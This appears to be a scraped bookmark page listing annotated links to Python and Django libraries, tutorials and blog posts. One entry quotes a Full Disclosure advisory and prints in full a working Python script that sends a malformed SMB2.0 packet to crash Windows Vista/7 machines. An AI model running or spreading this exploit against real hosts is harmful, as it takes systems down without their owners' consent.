I've written a textbook entitled "Machine Learning: An Algorithmic Perspective". It will be published by CRC Press, part of the Taylor and Francis group, on 2nd April 2009. The book is aimed at computer science and engineering undergraduates studing machine learning and artificial intelligence. There are lots of Python code examples in the book, and the code is available here. Where special datasets are used they are provided with the code, and there are links to additional datasets at the bottom of the page.
Python Debugging Techniques | Ayman Hourieh's Blog
code.interact(), Python debugger and logging
und the current line. Let's give it a try:
Top 10 tips to a new django developer : Dpeepul Blog
1.Don’t put project name in the imports For example suppose say you have an app “xyz” in the project say “project3” then don’t say
Nice tips for django apps: what not to do for beginners
edious to change DEBUG=False ( when moving to production server Often we forget to change DEBUG to False when we move from local environment to production
Python Package Index : topia.termextract 1.1.0
This package determines important terms within a given piece of content. It uses linguistic tools such as Parts-Of-Speech (POS) and some simple statistical analysis to determine the terms and their strength.
Term extraction and POS tagging in Python. Wonder how well the POS tagger performs.
Content Term Extraction using POS Tagging This package determines important terms within a given piece of content. It uses linguistic tools such as Parts-Of-Speech (POS) and some simple statistical analysis to determine the terms and their strength.
Finding and fixing memory leaks in Python - amix blog
"WSGI middleware which displays sparklines of Python object counts and allows you to introspect them, using the gc module under the hood"
Finding and fixing memory leaks can be a real challenge, but luckily Python has some pretty good tools for spotting these things. I have already written about this issue and this post will go into more details on how to spot and debug a memory leak in MySQLdb, which is the standard Python wrapper for MySQL.
Snakes on the Web
simple nice comment formatting.
A very interesting presentation on the past, present and future of webdev. Python and Django oriented.
That is, PHP suffers from most of the same problems as CGI, but to a lesser extent.
Joe Gregorio suggested Protocol Buffers as a efficient to implement inter-operation for applications built with different languages. Look in the comments for "Common Lisp Users" and laugh out loud. It's really true. Man, we, those who program as a business, are really screwed big time with mass concurrency problems.
Why do you hope you're using Python in 2020? I've been a Ruby developer for the last 3 years, but I don't hope I'm still using Ruby in 10 years. I hope something has come along by then and swept away my expectations of what programming can be like and replaced it with something that feels wholly new, like has happened for me multiple times. I'd feel stagnant and dependent if I was using one primary language for 10 years.
Bit of crystal ball peering
What sucks, now, about web development? How will we fix it? Can we fix it with Python?
Software Carpentry: Index
Software Carpentry is an intensive introduction to basic software development practices for scientists and engineers
Some notes on software carpentry
Eli Bendersky’s website » Blog Archive » Co-routines as an alternative to state machines
Observation: Co-routines are to state machines what recursion is to stacks When you have to traverse some sort of a nested data structure (say, a binary tree), one approach is to create a stack that remembers where in the tree you are. Another, much more elegant approach, is to write the function recursively. A recursive function employs the machine stack used to implicitly implement function calls - you get the benefits of the stack without paying the cost of reduced readability.
RapidSMS - Trac
RapidSMS is a free and open-source framework for dynamic data collection, logistics coordination and communication, leveraging basic short message service (SMS) mobile phone technology.
"RapidSMS is a free and open-source framework for dynamic data collection, logistics coordination and communication, leveraging basic short message service (SMS) mobile phone technology."
The technology behind Tornado, FriendFeed's web server - Bret Taylor's blog
I'm sure IIS is just as good. Right?
Blog post announcing the release of the Tornado web server, based on Python and epoll, providing an asynchronous programming model for web apps. Comes with a web-app framework supporting 3rd-party authentication via Facebook Connect, Twitter, Google, FF, OAuth, and OpenID.
Tornado Web Server
"open source version of the scalable, non-blocking web server and and tools that power FriendFeed"
Tornado is an open source version of the scalable, non-blocking web server and tools that power FriendFeed. The FriendFeed application is written using a web framework that looks a bit like or Google's webapp, but with additional tools and optimizations to take advantage of the underlying non-blocking infrastructure.
Tornado is an open source version of the scalable, non-blocking web server and tools that power FriendFeed.
AIMA Python file:
Netflix prize tribute: Recommendation algorithm in Python | This Number Crunching Life
Quick implementation of the Netflix recommendation algorithm (probablistic matrix factorization) in Python.
probabalistic matrix factorisation
I test my code using synthetic data, where I first make up latent vectors for users and items, then I generate some training set ratings by multiplying some latent user vectors by latent item vectors then adding some noise. I then discard the latent vectors and just give the model the synthetic ratings.
Dive Into Python 3
10 code snippets to interact with Twitter
Trocets de codi per fer cosetes amb twitter :P
Often called a revolution, Twitter is a very easy and cool way to communicate and promote your blog or service. In this article, I have compiled 10 very useful code snippets to interact with Twitter in your web dev projects.
Henrique C. Alves - Keeping simple with Django
Some good tips
After working for more than a year with Django, I collected here some tips about avoiding copy ‘n paste everywhere on your codebase
Stuff you shouldn't be doing when implemeting django applications. Good article
Diesel: How Python Does Comet
framework for writing network applications using asynchronous I/O in Python
diesel is a framework for writing network applications using asynchronous I/O in Python. It uses Python's generators to provide a friendly syntax for coroutines and continuations. It performs well and handles high concurrency with ease.
diesel is a framework for writing network applications using asynchronous I/O in Python.
diesel is a framework for writing network applications using asynchronous I/O in Python. It uses Python's generators to provide a friendly syntax for coroutines and continuations. It performs well and handles high concurrency with ease.
軽量スレッドブームだと思うので、そこらへんの情報をまとめてみる - 金利0無利息キャッシング – キャッシングできます - subtech
djangocon / Slides
Python Library for Google Translate - good coders code, great reuse
frickin sweet
I have extended my xgoogle library with a Python module for Google Translate. The new module is called “xgoogle.translate” and it implements two classes - “Translator” and “LanguageDetector“. The “Translator” class can be used to translate text. It provides a function called “translate” that takes three arguments - “message“, “lang_from” and “lang_to“. It returns the translated text as a Unicode string. Don’t forget to encode it to the right encoding before outputting, otherwise you’ll get errors such as “UnicodeEncodeError: ‘latin-1′ codec can’t encode characters in position 0-3: ordinal not in range(256)”
Llyfrgell google translate i python
Python Project Howto — Python Project Howto
Plumber Jack: Python Logging 101
A Lesson In Timing Attacks (or, Don't use MessageDigest.isEquals) |
Timing Attacks
Google Code Samples
Python is Unix
Simple preforking echo server in Python. Python port of
The Life of Python - 20 Greatest Monty Python Sketches
The Holy Grail of Python’s 20 most hilarious sketches, celebrating their 40th anniversary.
Scriptlets - Quick web scripts
to get a URL that will run this code.
A really neat Google App that lets you enter a code snippet in js, PHP or Python, and then run it if you so desire with GET and POST vars; if that's not enough, you can also fire off an HTTP POST to a third party server. So what? So if you ever have a code fragment you need to host and want to be able to call with a variable or two, this service is ideal :-) The perfect accompaniment to a Yahoo Pipe:-)
YouTube - Lec 1 | MIT 6.00 Introduction to Computer Science and Programming, Fall 2008
MIT programming 101. Very basic python intro
Lecture 1: Goals of the course; what is computation; introduction to data types, operators, and variablesInstructors: Prof. Eric Grimson, Prof. John Guttag V...
Tornado Web Server Documentation
Era un po' che non mi emozionava una tecnologia...
"FriendFeed's web server is a relatively simple, non-blocking web server written in Python. [...] Tornado is an open source version of this web server and some of the tools we use most often at FriendFeed." can handle 8000 reqs/s
Why I like Redis
Like mongodb but lives in memory with replication and periodic store-to-disk. Like memcached but with data structures. Great for non-critical data or replicated critical data.
Plurk Open Source - Solace - The Comfort of the Collective
Solace is a fully open-sourced multilingual support and knowledge exchange platform written in Python.
open source version of FAQ oftware
The development of Solace is inspired and has been guided in support of our mission on creating a truly open and vibrant social service that users feel wholly responsible for shaping into what it is today. Plurk has been using this same spirit of user involvement since late 2007 with its Plurk Collaborative Translation Project and continues to build upon those roots today.
"Solace is a fully open-sourced multilingual support and knowledge exchange platform written in Python. "
Hivelogic - Backing Up Flickr
Dan Benjamin used an app designed for copying Flickr archives to an iPod Touch, and made a slight modification so that it backs up the full-size images instead.
After asking the Twitterverse for suggestions and trying many different applications, scripts, and techniques unsuccessfully, my friend Willie recommended I take a look at FlickrTouchr. FlickrTouchr is a Python script that you run via the command-line, which works fine on Mac OS X
Introduction — bobo v0.2 documentation
bobo reborn
Bobo is a light-weight framework for creating WSGI web applications.
It provides 2 features: (i) mapping URLs to objects; and (ii) calling objects to generate HTTP responses.
Ned Batchelder: Bare-bones basic Mercurial for Subversion users
Quick mercurial guide for svn users
The Go Programming Language
Google 発の開発言語
Home of the new Google Go language.
"a systems programming language expressive, concurrent, garbage-collected" -- BSD license
expressive, concurrent, garbage-collected
Writing good documentation (part 1)
Writing great documentation: what to write
Annotated link
How to Make a US County Thematic Map Using Free Tools | FlowingData
Nice tutorial.
This worked very well; lots of ideas here.
Python Package Index : pdfminer 20090330
PDFMiner is a suite of programs that aims to help extracting or analyzing text data from PDF documents. Unlike other PDF-related tools, it allows to obtain the exact location of texts in a page, as well as other layout information such as font size or font name, which could be useful for analyzing the document. It can be also used as a basis for a full-fledged PDF interpreter.
Why MIT switched from Scheme to Python | Wisdom and Wonder
* Why MIT switched from Scheme to Python
A Django Development Environment with zc.buildout — Stereoplex
This article will show you how to create a repeatable Django development environment from scratch using zc.buildout.
Buildout is a tool for reliably creating reproducible software builds. It was originally developed by Zope Corporation, and is often used in Zope builds; however, there's no dependency on Zope. You can use it to build pretty much anything. And I'm going to show you how to get a Django build up and running using it.
A Django Development Environment with zc.buildout
django buildout cfg for easy setup
Django with Mysql and Apache on EC2 — The Uswaretech Blog - Django Web Development
Django with Mysql and Apache
Couchdbkit - Welcome to the Couchdbkit project
Facebook Developers | Facebook Developers News
Tornado: Facebook's Real-Time Web Framework for Python
Possible to build a site like FB.. using Tornado Cassandra, Hive (hadoop underneath) memcache, Scribe, Thrift.
Real-time updates have become an important aspect of the social Web that make it easier to share with friends. In March, we introduced a real-time News Feed to make the stream as relevant and engaging as possible for users. Similarly, FriendFeed, which we recently acquired, built their entire site to support real-time updates. It hasn't been easy to build and scale these features, so today we're open-sourcing a core piece of infrastructure called Tornado, which was originally developed by the FriendFeed team. Tornado is a relatively simple, non-blocking Web server framework written in Python, designed to handle thousands of simultaneous connections, making it ideal for real-time Web services. Tornado is a core piece of infrastructure that powers FriendFeed's real-time functionality, which we plan to actively maintain. While Tornado is similar to existing Web-frameworks in Python (Django, Google's webapp,, it focuses on speed and handling large amounts of simultaneous traffic.
starting point for ressources about Tornado python based webserver and tools
Drupal or Django? A Guide for Decision Makers — scot hacker’s foobar blog
This document aims to lay out the pros and cons of two popular web publishing platforms: The PHP-based Drupal content management system (CMS) and the Python-based Django framework. It’s impossible to discuss systems like these in a non-technical way. However, I’ve tried to lay out the main points in straightforward language, with an eye toward helping supervisors make an informed choice.
Drupal represents a middle ground between framework and CMS that we’ve chosen not to take. Drupal is far more capable than a CMS like WordPress, but also much less flexible than a pure framework. But more importantly, the facts that Drupal isn’t object-oriented, isn’t MVC/MTV, doesn’t have an ORM, and is generally less flexible than a pure framework, not to mention our preference for working in Python over PHP, all contribute to our decision not to use it. In the end, a good developer can do good work with just about any system, while a bad developer can make mincemeat of even the best system. It’s not all about the platform. But modern tools and best practices in platform design go a long way toward ending up with a cleaner, faster, better-designed architecture that precisely matches the needs of your organizations, with no assumptions or historical baggage to work around.
someone asked me this very question the other day. another reference to hand out on such occasions to support my advice.
Thank you for giving me the opportunity to explain this to you [dive into mark]
I was about to write “gives third parties the right,” until I realized that there are no third parties because there are no second parties.
Debugging in Python « Python Conquers The Universe
PDB Overview
Under the Covers of the Google App Engine Datastore ‎(2008 Google I/O Session Videos and Slides)‎
Presentation on how googleapps datastore implements filtering and sorting on top of bigtable. Basically, all queries are translated to bigtable prefix scans or range scans, without needing any in-memory postprocessing, all rows returned from the scan are relevant to, and in order, for the query. There's a built-in 'single property index' (or two actually: one asc and one desc) which can obviously be used for single-property searches, but also for queries consisting of only equals clauses, by doing multiple range scans and taking the intersection (not sure at which level this happens). More complex queries need specific pre-defined indexes. Index tables only have keys, no columns with values. Indexes are updated synchronously, so everything stays consistent (at the cost of contention problems?). Some mention of string-byte considerations when doing range queries. No fulltext queries. Ends with some talk on transactions.
Python Library for Google Search - good coders code, great reuse
Here is a quick hack that I wrote. It’s a Python library to search Google without using their API. It’s quick and dirty, just the way I love it. Why didn’t I use Google’s provided REST API? Because it says “you can only get up to 8 results in a single call and you can’t go beyond the first 32 results”. Seriously, what am I gonna do with just 32 results?
# Python Library for Searching Adwords # Python Library for Google Translate # Python Library for Google Sets
from import GoogleSearch, SearchError try: gs = GoogleSearch("quick and dirty") gs.results_per_page = 50 results = gs.get_results() for res in results: print res.title.encode('utf8') print res.desc.encode('utf8') print res.url.encode('utf8') print except SearchError, e: print "Search failed: %s" % e
Welcome to Elefant — Elefant
Efficient Learning, Large-scale Inference, and Optimisation Toolkit
Elefant (Efficient Learning, Large-scale Inference, and Optimisation Toolkit) is an open source library for machine learning licensed under the Mozilla Public License
Elefant (Efficient Learning, Large-scale Inference, and Optimisation Toolkit) is an open source library for machine learning licensed under the Mozilla Public License (MPL).
TippingPoint | DVLabs | Python Interfacing a USB Missile Launcher
マジすげぇ!! iPhone に何でも通知 - YoshioriのBlog これを使って iPhone アプリ Receive your notification at iPhone に通知出来まする
uWSGI is a fast (pure C), self-healing, developer-friendly WSGI server, aimed for professional python webapps deployment and development.
namebench - Project Hosting on Google Code
Namebench hunts down the fastest DNS servers available for your computer to use. namebench runs a fair and thorough benchmark using your web browser history, tcpdump output, or standardized datasets in order to provide an individualized recommendation.
Are you a power-user with 5 minutes to spare? Do you want a faster internet experience? Try out namebench. It hunts down the fastest DNS servers available for your computer to use. namebench runs a fair and thorough benchmark using your web browser history, tcpdump output, or standardized datasets in order to provide an individualized recommendation. namebench is completely free and does not modify your system in any way. This project began as a 20% project at Google. namebench runs on Mac OS X, Windows, and UNIX, and is available with a graphical user interface as well as a command-line interface.
You work for me, Computer: Dropping Django
Development to Deployment in Django @ Irrational Exuberance
In my quest to find the ultimate deployment methodology for Django, this is one of the better ones I've found.
django deployment tutorial
it different, but I find that it saves a few precious moments of thinking to just keep a standardized project template somewhere (instead of using djangoadmin startproject to create new projects).
Python Open Flash Chart (pyOFC2) — Home
some slick python charting software
rev=canonical bookmarklet and designing shorter URLs
Bookmarklet that will 1st check canonical, if there is no shortURL, then it will create one using TinyURL
from simon willison's weblog.
A bookmarklet to extract rev="canonical" links from pages. I only use a few sites that support this at the moment (notably Flickr), but it's quite handy.
YUI Doc: A New Tool for Generating JavaScript API Documentation » Yahoo! User Interface Blog
argparse - Google Code
The argparse module provides an easy, declarative interface for creating command line tools, which knows how to: * parse the arguments and flags from sys.argv * convert arg strings into objects for your program * format and print informative help messages * and much more... The argparse module improves on the standard library optparse module in a number of ways including: * handling positional arguments * supporting sub-commands * allowing alternative option prefixes like + and / * handling zero-or-more and one-or-more style arguments * producing more informative usage messages * providing a much simpler interface for custom types and actions
Enhanced command line parsing in Python.
Article about advantages of scripting languages over system programming languages
Scripting: Higher Level Programming
Scripting languages such as Perl and Tcl represent a very different style of programming than system programming languages such as C or JavaTM. Scripting languages are designed for "gluing" applications; they use typeless approaches to achieve a higher level of programming and more rapid application development than system programming languages. Increases in computer speed and changes in the application mix are making scripting languages more and more important for applications of the future.
What’s New in Python 2.6 — Python v2.6 documentation
Official page on 2.6 on Lots of Python 3 compatibility features/
django-solr-search - Google Code
"Django Solr search is a Django pluggable for rapidly integrating Solr search into a Django Application."
Django module for implementing Solr search
Django Solr search is a Django pluggable for rapidly integrating Solr search into a Django Application. It was originally written for The Washington Times. Readers where complaining that they were never able to find relevant content and they weren't given the tools to narrow down their search. With some of our past experiences with Solr it seemed like the obvious choice for this type of enterprise search concept.
Django module for integrating solr search.
Django pluggable for integrating Solr search. Updated to work with Django 1.0. Can even generate schema.xml files on the fly.
Wooji Juice: JavaScript for C & Python programmers
This is an introduction to JavaScript. There are plenty of these on the web, but most of them appear to be for non-programmers, teaching the building-blocks of programming as JavaScript uses them. And that's fine, because many people who have never programmed in their lives, find themselves needing a tiny bit of script for their web page, and need to start somewhere.
Easy Map-Reduce With Hadoop Streaming -
If you're considering doing large scale analysis of structured data (access logs, for example), there are dozens of enterprise-level solutions ranging from specialized streaming databases, to the more mundane data warehousing solutions with star topologies and column store semantics. Google, facing the same problem, developed a system called Sawzall, which leverages their existing Map-Reduce clusters for large scale parallel data analysis by adding a DSL for easy manipulation of data.
Map/Reduce Toolkit by NY Times engineers is a great example of a Ruby DSL on top of the Hadoop Streaming interface. Specifically aimed at simplifying their internal log processing jobs, it exposes just the necessary bits for handling the access log inputs and provides a number of predefined reduce steps: unique, counter, etc. For example, to get a list of all unique visitor IP's, the entire program consists of:
ClueMapper – Trac
ClueMapper is a web-based application for managing software and software-based consulting projects. Currently it uses Trac to handle individual projects but adds the ability to create new trac instances, svn configurations, etc.
ClueMapper is a web-based application for managing software and software-based consulting projects. Currently it uses Trac to handle individual projects but adds the ability to create new trac instances, svn configurations, etc. The website for ClueMapper is at
"ClueMapper is a web-based application for managing software and software-based consulting projects. Currently it uses Trac to handle individual projects but adds the ability to create new trac instances, svn configurations, etc."
Invent with Python
Nicholas Piël » Socket Benchmark of Asynchronous Servers in Python
This also shows that for massively concurrent problems, such as lots of parallel comet connections, the GIL in Python is a non-issue as we handle the concurrent connections in a single thread. In this post i am going to look at a selection of asynchronous servers implemented in Python.
* is Unix
Ryan’s I like Unicorn because it’s Unix appears to have started a mini-meme of folks writing simple forking network servers in their language of choice. I’m really enjoying reading ‘em — they’re a sort of Rosetta Stone of network code — so I’m going to keep a running list of links here. Tell me about any I’ve missed (via email, comments, or twitter) and I’ll add ‘em to the list.
a . . . of Rosetta Stone of network code
Return Boolean True: Eye Fi Standalone Server
A Crash Course in Django [Server Side Essentials]
Are you after a web framework that drastically cuts the time it takes to build data-driven web apps? If so, the Python-based Django might be worth investigating. With a unique architecture enabling extensive code reuse and an automatic admin system, Django is the state of the art for independent web developers, as well as being a strong tool for large scale web projects. In this article, I’ll show you how the basics of setting up your own Django-powered web site.
Kent's Korner: Decorators
def repeat3(f): ... def inner(*args, **kwds): ... f(*args, **kwds) ... f(*args, **kwds) ... return f(*args, **kwds) ... return inner
Decorators simply illustrated
Atomisator – Trac
Atomisator is a data aggregator framework. Its purpose is to provide an engine to build any kind of data by merging several sources of data.
Atomisator – Trac; homepage for book and Atomisator project; September 2008 ISBN 184719494X; This book is an authoritative exploration of Python best practices and applications of agile methodologies to Python, illustrated with practical, real-world examples. quick and easy MapReduce for Python quick and easy MapReduce for Python
showcases an example of using the mapreduce system
breily's juno at master - GitHub
ligthweight REST framework for python - Juno violates some usual principles of good design (don't use global variables, don't do things implicitly, etc.) for the sake of fast development and less boilerplate code
like Ruby's Sinatra, but for Python
Sinatra for Python
pyprocessing - Project Hosting on Google Code
This project provides a Python package that creates an environment for graphics applications that closely resembles that of the Processing system
Python implementation of Processing, based on Pyglet.
A Processing-like environment for doing graphics with Python
djangozen | find stuff for django
Call them best practices if you like, but here's the things I do when starting a new Django project.
I’ve lately been trying to compile Arduino projects from command line. Primarily because the Arduino IDE wasn’t working out of the box on 64-bit Ubuntu (9.04). That problem was eventually solved, but I’ve been meaning to move away from that IDE anyway. If you happen to be replacing the Arduino IDE with Vim, I just uploaded an Arduino syntax file.
Includes python script to use the DTR autoreset feature.
Project SIKULI
Logiciel d'automatisation de tâches dans un OS avec une approche visuelle/graphique.
"Sikuli is a visual technology to search and automate graphical user interfaces (GUI) using images (screenshots). The first release of Sikuli contains Sikuli Script, a visual scripting API for Jython, and Sikuli IDE, an integrated development environment for writing visual scripts with screenshots easily. Sikuli Script automates anything you see on the screen without internal API's support. You can programmatically control a web page, a desktop application running on Windows/Linux/Mac OS X, or even an iphone application running in an emulator."
Sikuli is a visual technology to search and automate graphical user interfaces (GUI) using images (screenshots).
slime -- wingolog
Project SIKULI
Sikuli is a visual technology to search and automate graphical user interfaces (GUI) using images (screenshots). The first release of Sikuli contains Sikuli Script, a visual scripting API for Jython, and Sikuli IDE, an integrated development environment for writing visual scripts with screenshots easily. Sikuli Script automates anything you see on the screen without internal API's support. You can programmatically control a web page, a desktop application running on Windows/Linux/Mac OS X, or even an iphone application running in an emulator.
Top 10 tips to a new django developer - 0 & 1
gist: 289467 - GitHub
libcloud python library - a unified interface to cloud server providers
"libcloud is a standard client library for many popular cloud providers, written in python."
"libcloud is a standard client library for many popular cloud providers, written in python "
libcloud is a standard client library for many popular cloud providers, written in python
Evaluating Django Caching Options |
Good overview of Django Caching Techniques
The Knight's Tour
The Knight's Tour is a mathematical problem involving a knight on a chessboard. The knight is placed on the empty board and, moving according to the rules of chess, must visit each square exactly once.
d at runtime g_board = [] # the board will be constructed as a list o
python-sqlparse - Google Code
sqlparse is a non-validating SQL parser for Python. It provides support for parsing, splitting and formatting SQL statements.
sqlparse is a non-validating SQL parser for Python. It provides support for parsing, splitting and formatting SQL statements.
Support for parsing, splitting and formatting SQL statements.
BruceEckel / Python 3 Patterns & Idioms / overview —
Bruce Eckel's (of _Thinking in Java_ fame) Creative Commons licensed book about Python 3.
An open source book written and edited by Bruce Eckel with contributions and help from the Python community. Published under the Creative Commons Attribution-Share Alike 3.0 license.
Full Disclosure: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. #!/usr/bin/python from time import sleep host = "IP_ADDR", 445 buff = ( "\x00\x00\x00\x90" # Begin SMB header: Session message "\xff\x53\x4d\x42" # Server Component: SMB "\x72\x00\x00\x00" # Negociate Protocol "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853 "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" "\x30\x30\x32\x00" ) s = socket() s.connect(host) s.send(buff) s.close()
This is why we do regression testing, folks! -- hyper-fast mini-webapp production, in Python
You should need to know a little about using the command line, and perhaps a little Python, before using this.
Curing Python's Neglect
I don't know python so I can't say whether these gripes are legitimate, but it's useful to remind yourself to look for such inconsistencies in how you do things, or in the tools you use every day
ctypes-opencv - Google Code
ctypes-opencv is a package that brings Willow Garage's (formerly Intel's) Open Source Computer Vision Library (OpenCV) to Python. OpenCV is a collection of algorithms and sample code for various computer vision problems. The goal of ctypes-opencv is to provide Python access to all documented functionality of OpenCV.
Beanstalkd / Python Basic Tutorial - Standard Deviations
Beanstalkd is an in-memory queuing system. It supports named queues (called ‘tubes’), priorities, and delayed delivery of messages. Terminology: a message is called a job, and queues are called tubes
c = serverconn.ServerConn('localhost', 99988)
MVC programming with python (newbie) - please help
"MVC is all about separation of concerns. […] Now, here's the test of a true MVC design: the program should in essence be fully functional even without a View/Controller attached. OK, the outside world will have trouble interacting with it in that form, but as long as one knows the appropriate Model API incantations, the program will hold and manipulate data as normal."
Very good description of MVC
"MVC is all about separation of concerns."
What Pythonistas Think of Ruby | Free PeepCode Blog
The very things I find ugly in Ruby are what make amazing Ruby software like RSpec possible, and that Python could never have (given the current implementation). Gary Bernhardt I think Ruby's syntax is ugly until they do something glorious and beautiful with it like Rake, then I think "damn it!" Unidentified Attendee
DreamPie: The Python shell you've always dreamed about!
DreamPie is a Python shell which is designed to be reliable and fun.
Like, Python
I'd like a ORLY dialect. kthxbye.
Like, Python was created by Jonathan Howard in February 2010 while drinking and reviewing code for an upcoming project with a coworker. At a certain point, higher-level explanations devolved into just flat-out reading Python code like they were actually speaking the language normally - complete with like's, um's, whatever's, etc - making it completely impractical/awesome for work. It was then that Jonathan realized he should perhaps stop for the night. And START creating Like, Python. e.g. ok so like name = raw_input("yo! what's your name?" ) right if name.strip() is actually like "": toootally just exit() else: um yeah print like "Hi %s, nice to meet you." % name
"It's about time programming languages understood what the kids are typing these days. So let's start with a baby step in that direction: Like, Python."
PiCloud | Cloud Computing. Simplified.
import a lib in your python and run code automagically in parallel on a remote cluster. pricing is time used x processes plus data xfer
How to Setup Your Own Web Proxy Server For Free with Google App Engine [Video Tutorial]
... use a Google account to set up a proxy server that runs off the Google Apps Engine and allows you to browse via proxy independent of your home network and without having to trust a sketchy third-party proxy...
This Week in Django | Django From the Ground Up: Episodes 1 and 2
This Week in Django is your ongoing source for all things Django. We have interviews, tips, special topics, screencasts, callcasts and a ton of fun.
Another take on content negotiation
serve content based on client accept header. whatever user is asking for i.e. json or xml.
Building Skills in Python — Building Skills in Python
- Language Basics A Programmer’s Introduction to Python - Data Structures - Data + Processing = Objects - Components, Modules and Packages - Projects
Looks like a decent book to get going with python. All online - so likely to be updated at least every so often.
Nicholas Piël » Benchmark of Python Web Servers
Benchmarks super intéressant de quasi tout les webservers python (de mod_wsgi à Twisted en passant par CherryPy). Je ne les connaissais pas tous et certains semblent vraiment fort intéressant (je pense notamment à uWsgi).
TkDocs - Tk Tutorial
Python 3 Tkinter tutorial
Google's Python Class - Google's Python Class - Google Code
Welcome to Google's Python Class -- this is a free class for people with a little bit of programming experience who want to learn Python
Prime Numbers and the Benford’s Law | Pyevolve
"Prime Numbers and the Benford's Law | Pyevolve" [from]
Pyevolve - A complete genetic algorithm framework written in pure python
The MessagePack Project
MessagePack is a binary-based efficient object serialization library. It enables to exchange structured objects between many languages like JSON. But unlike JSON, it is very fast and small.
"MessagePack is a binary-based efficient object serialization library. It enables to exchange structured objects between many languages like JSON. But unlike JSON, it is very fast and small." -- apache license
snakebite: the open network
this guy gave a very funny presentation at the TiP BoF
A build farm for cross-platform open source development; not yet open for business?
python build farm
Snakebite is a network that strives to provide developers of open source projects complete and unrestricted access to as many different platforms, operating systems, architectures, compilers, devices, databases, tools and applications that they may need in order to optimally develop their software.
Programming Languages - Google Code University - Google Code
Building SEO optimised Django web applications — The Uswaretech Blog - Django Web Development
Using Django's built in tools for performing SEO. Including pinging Google when site content has changed.
Best practices in web development with Python and Django « News Apps Blog
Best practices in web development with Python and Django
EveryBlock source code released / The EveryBlock Blog
oooh, I was waiting for this! would love to play around with this for oly.
Multiprocessing with Python
Learn to scale your UNIX® Python applications to multiple cores by using the multiprocessing module which is built into Python 2.6. Multiprocessing mimics parts of the threading API in Python to give the developer a high level of control over flocks of processes, but also incorporates many additional features unique to processes.
In a previous article for IBM® developerWorks®, I demonstrated a simple and effective pattern for implementing threaded programming in Python. One downside of this approach, though, is that it won't always speed up your application, because the GIL (global interpreter lock) effectively limits threads to one core. If you need to use all of the cores on your machine, then typically you will need to fork processes, to increase speed. Dealing with a flock of processes can be a challenge, because if communication between processes is needed, it can often get complicated to coordinate all of the calls. Fortunately, as of version 2.6, Python includes a module called "multiprocessing" to help you deal with processes. The API of the processing module has some similarities to the way the threading API works, but there are also few differences to keep in mind. One of the main differences is that processes have subtle underlying behavior that a high-level API will never be able to completely abst
Zero Intelligence Agents » UPDATED: Must-Have Python Packages for Social Scientists
RT @tweetlicius: Zero Intelligence Agents » UPDATED: Must-Have Python Packages for Social Scientists -
#smjgc1 Talk about zero intellegence nice way to analyse data social networks #wiki35carib – leroyh (leroyh)
If you are a new researcher looking to get started, or experienced and willing to walk away from your lifestyle in Matlab—and licensing and training fees—then equip yourself with these 10 packages and get to it!
assertTrue( ): One of the toughest job-interview questions ever
I mentioned in a previous post that I once interviewed for a job at a well-known search company. One of the five people who interviewed me asked a question that resulted in an hour-long discussion: "Explain how you would develop a frequency-sorted list of the ten thousand most-used words in the English language." I'm not sure why anyone would ask that kind of question in the course of an interview for a technical writing job (it's more of a software-design kind of question), but it led to a lively discussion, and I still think it's one of the best technical-interview questions I've ever heard. Ask yourself: How would you answer that question?
I mentioned in a previous post that I once interviewed for a job at a well-known search company. One of the five people who interviewed me asked a question that resulted in an hour-long discussion: "Explain how you would develop a frequency-sorted list of the ten thousand most-used words in the English language."
The author talks about a question he got at a job interview, and goes on to provide a reasonable recap/discussion about hash tables. This is generally the kind of answer I look for when I ask similar questions. 9/10 candidates I talk with can't actually discuss a hash function, and don't know how to create one.
Switched to Python Fabric | Es Tea Double Eye
An Exercise in Species Barcoding
Recently I've been looking at the International Barcode of Life project. The idea is take DNA samples from animals and plants to help identify known species and discover new ones. While other projects strive to identify the complete genome for a few species, such as humans, dogs, red flour beetles and others, the barcoding project looks at a short 650-base sequence from a single gene. The idea is that this short sequence may not tell the whole story of an organism, but it should be enough to identify and distinguish between species. It will be successful as a barcode if (a) all (or most) members of a species have the same (or very similar) sequences and (b) members of different species have very different sequences.
Introduction to Computer Science and Programming | MIT Video Course
Setting up Django and Sphinx Full-text Search (django-sphinx) | David Cramer's Blog
fast full-text search
Django-Based Blog on Google App Engine Tutorial, Part 1 |
"I've spent some time over the last few weeks playing around with the Google App Engine so I figured it may be helpful to share some of the things that I have learned and do a tutorial series on how I built this simple blog using the GAE and Django."
Учебник по языку программирования Python (хабраиндекс) / Язык программирования Python / Хабрахабр
Серия статей «Основы Python» I, Начало II, Строки III, Списки, кортежи, файлы IV, Генераторы списков V, Определение функций, основы VI, Расширенное определение функций Об основах языка Python в сжатой форме Продвинутый уровень Сила и красота декораторов Короткий экскурс в метапрограммирование. Итерируем все и вся Специфика циклов в Питоне. Как я учился работать с XML Консервация объектов в Python Использование модуля Pickle. Memoization в Python Оптимизация работы программ. Простейшее рисование с помощью PIL Regexp и Python: извлечение токенов из текста Как писать маленькие приложения на python с графическим интерфейсом (библиотека Qt). Одеваем скрипты Python с помощью EasyGui (добавляем простой диалоговый интерфейс) Учебник по Django (Python-фреймворк для веб-приложений)
Strings - Dive into Python 3
